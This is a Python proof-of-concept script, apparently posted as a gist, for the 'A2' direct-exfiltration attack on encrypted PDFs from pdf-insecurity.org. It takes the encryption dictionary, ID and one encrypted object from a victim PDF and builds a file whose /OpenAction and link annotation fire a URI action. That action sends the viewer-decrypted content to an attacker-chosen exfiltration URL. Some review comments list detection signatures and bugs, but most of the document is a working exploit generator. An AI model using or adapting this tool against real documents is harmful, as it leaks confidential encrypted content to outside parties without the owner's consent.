@Areizen
Created April 30, 2020 17:48
POC of pdf-insecurity.com
from binascii import hexlify
import sys
import re
# PDF TEMPLATE, index number should be shifted enough to avoid collision with number of the object
# we want to exfiltrate
#
# Skeleton filled in by main() via str.format(). Placeholders:
#   {stream_obj_number}          object number of the copied encrypted object
#   {stream_content_hex_encoded} its raw bytes, hex-encoded (object body is "<...>")
#   {encrypt_obj}                the /Encrypt dictionary copied from the source PDF
#   {random_id}                  the trailer /ID array copied from the source PDF
#   {url_exfiltration}           string object 800, used as the /URI /Base (object 100)
# Object 700 is a /URI action reached both through /OpenAction (object 100) and the
# link annotation 600; its /URI is an indirect reference to the copied encrypted object
# rather than a literal string.
#
# Review notes (defensive):
#  - The /Encrypt dictionary and /ID are those of a *different* file, and the xref
#    table is internally inconsistent: "0 11" / "/Size 11" while object numbers run
#    100..1000, and most entries are not the 20-byte "oooooooooo ggggg n" form required
#    by the spec. A document whose xref cannot possibly be valid is a cheap static
#    signature; presumably the file only opens because viewers reconstruct the xref
#    (not confirmed here).
#  - A /URI action whose target is an indirect reference into an encrypted object,
#    combined with /OpenAction, is the pattern worth flagging; viewers that do not
#    follow URI actions without user confirmation break this path.
#  - The bytes inside object 400's stream are non-ASCII and opaque; they are written
#    back in text mode by main(), so the emitted file depends on the locale encoding.
PDF_TEMPLATE = """%PDF-2.0
100 0 obj
<< /Type /Catalog
/Pages 200 0 R
/URI << /Base 800 0 R >>
/ViewerPreferences << /DisplayDocTitle true >>
/OpenAction 700 0 R
>>
endobj
200 0 obj
<< /Type /Pages
/Kids [300 0 R]
/Count 1
/MediaBox [0 0 595 842]
>>
endobj
300 0 obj
<< /Type /Page
/Parent 200 0 R
/Resources << /Font << /F1 << /Type /Font /Subtype /Type1 /BaseFont /Courier >> >> >>
/Annots [500 0 R 600 0 R]
/Contents [400 0 R]
>>
endobj
400 0 obj
<< /Length 112 >>
stream
����*aTDGT��#M���e|���(���\�
�"�ᖬ@���-��G�x,P�ɢ5���Q�8��~<��-�my��T ����endstream
endobj
500 0 obj
<< /Type /Annot
/Subtype /FreeText
/BS << /S /S /W 0 >>
/Rect [90 620 500 720] /F 4
/DA <f86595e63163e1c2e0a86f578b25cd64d1260e7336190d87aba1f008912a1061541744475480da234df9a7d6657c83eb7f16a628b5b7a15ce30cf5228ce196ac4092dc1bb9ae2df5a647c8782c135084c9a2359cf013e05117ee38c0a27b7e3c01b0822ddc6d79169ec65409d0f9bab7>
/Contents 800 0 R
>>
endobj
600 0 obj
<< /Type /Annot
/Subtype /Link
/Open true
/Rect [0 0 595 600]
/A 700 0 R
/H /N
>>
endobj
700 0 obj
<< /Type /Action
/S /URI
/URI {stream_obj_number} 0 R
>>
endobj
800 0 obj
({url_exfiltration})
endobj
{stream_obj_number} 0 obj
<{stream_content_hex_encoded}> % = enc(SECRET)
endobj
1000 0 obj
{encrypt_obj}
endobj
xref
0 11
0000000000 65535 f
000000001000 00000 n
000000017200 00000 n
000000027300 00000 n
000000047100 00000 n
000000063600 00000 n
000000101500 00000 n
0000001140 00000 n
0000001209 00000 n
000000125300 00000 n
000000135200 00000 n
trailer
<< /Root 100 0 R
/Size 11
/Encrypt 1000 0 R
/ID {random_id}
/Info << /Title 800 0 R >>
>>
startxref
1940
%%EOF
"""
# Byte patterns run against the raw source PDF in main() with MULTILINE | DOTALL.
# All three key on exact "\n" placement and on the dictionary being written without
# spaces (e.g. "/Filter/Standard"), so a pretty-printed or CRLF file, or one whose
# trailer lives in an object stream, simply fails to match (main() then dies on
# None.group()).
#
# Captures the whole "<</Filter/Standard ... >>" encryption dictionary as "encrypt_obj".
REGEX_ENCRYPT = rb"obj\n(?P<encrypt_obj><<\/Filter\/Standard(.*?)>>)\nendobj"
# main() prepends the object number bytes to this. It is not anchored, so a prefix
# such as b"5" also matches "15 0 obj", "25 0 obj", ...; re.search returns the first
# hit in file order. Captures the bytes between "stream\n" and "\nendstream" as "stream".
REGEX_STREAM = rb"\s\d+ obj\n<<.*?>>\sstream\n(?P<stream>.*?)\nendstream\nendobj"
# Captures the bracketed array following the first "/ID" in the file as "id";
# a file with several trailers (incremental updates) yields the earliest one.
REGEX_ID = rb"\/ID.*?(?P<id>\[.*?])"
def main(pdf: str, obj_n: str, url_exfiltration: str, output: str) -> None:
    """
    Generate a pdf that exploits the A2 vuln described in https://pdf-insecurity.org/

    Copies the /Encrypt dictionary, trailer /ID and one encrypted object out of
    ``pdf`` into PDF_TEMPLATE and writes the result to ``output``.

    :param pdf: path of a pdf for which you do not have the key
    :param obj_n: object number (as a decimal string) of the object to copy
    :param url_exfiltration: URL placed in object 800, the /URI /Base of the output
    :param output: the output pdf path
    :raises AttributeError: if any of the three patterns does not match
        (``re.search`` returns None and ``.group`` is called on it)
    """
    # opening the encrypted_pdf
    # NOTE(review): the handle is never closed; a with-block would be the idiom.
    encrypted_pdf = open(pdf, "rb").read()
    # extract all useful informations
    encrypt = re.search(REGEX_ENCRYPT, encrypted_pdf, re.MULTILINE | re.DOTALL).group("encrypt_obj")
    # obj_n is prepended unanchored: "5" also matches "15 0 obj" — first match in file order wins.
    stream = re.search(obj_n.encode() + REGEX_STREAM, encrypted_pdf, re.MULTILINE | re.DOTALL).group("stream")
    id_part = re.search(REGEX_ID, encrypted_pdf,re.MULTILINE | re.DOTALL).group("id")
    # hex so the ciphertext can be embedded as a PDF hex string ("<...>") in the template
    stream = hexlify(stream)
    # debugging output of the three extracted pieces (bytes repr)
    print(stream)
    print(encrypt)
    print(id_part)
    output_pdf = PDF_TEMPLATE.format(stream_obj_number=obj_n, random_id = id_part.decode(),encrypt_obj = encrypt.decode(),stream_content_hex_encoded = stream.decode(),url_exfiltration = url_exfiltration)
    # NOTE(review): text mode with no explicit encoding, and the template holds
    # non-ASCII bytes (object 400); the written bytes therefore vary with the locale
    # and "\n" may be translated on Windows. Handle is never closed either.
    open(output,"w").write(output_pdf)
if __name__ == '__main__':
    # CLI entry: exactly four positional arguments, otherwise print usage and exit non-zero.
    if len(sys.argv) != 5:
        print(f"[-] Usage : {sys.argv[0]} <pdf_to_spoof> <object_no_to_decrypt> <url_exfiltration> <output_pdf>")
        sys.exit(-1)
    main(pdf=sys.argv[1],obj_n=sys.argv[2],url_exfiltration=sys.argv[3],output=sys.argv[4])